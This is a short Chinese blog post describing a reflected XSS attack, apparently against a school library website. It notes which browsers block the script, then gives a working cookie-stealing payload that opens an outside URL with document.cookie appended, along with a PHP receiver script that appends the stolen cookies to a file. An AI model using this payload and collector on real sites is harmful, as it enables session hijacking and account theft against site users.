XSS之学校图书馆

1.不同的浏览器对js脚本的过滤措施不同,IE可以执行的,搜狗和Chrome提示Token contains reflects xss啥的

搜狗浏览器:

IE:

 

2.获取cookie

...............class=<script>window.open("http://www.cnblogs.com/1.php?cookie="+document.cookie)</script>解析:打开访问这个网址的窗口,并且通过msg传递一个变量这个变量就是cookie,IE把单引号标识为非法字符

在网站http://www.cnblogs.com/下的1.php接收cookie文件

<?php

  $cookie=$_GET['cookie'];

  $file=fopen('1.txt','a');

  fwrite($file,$cookie);

  fclose($file);

?>

 

posted @ 2017-03-26 17:03  黑暗中的小郎君  阅读(179)  评论(0编辑  收藏  举报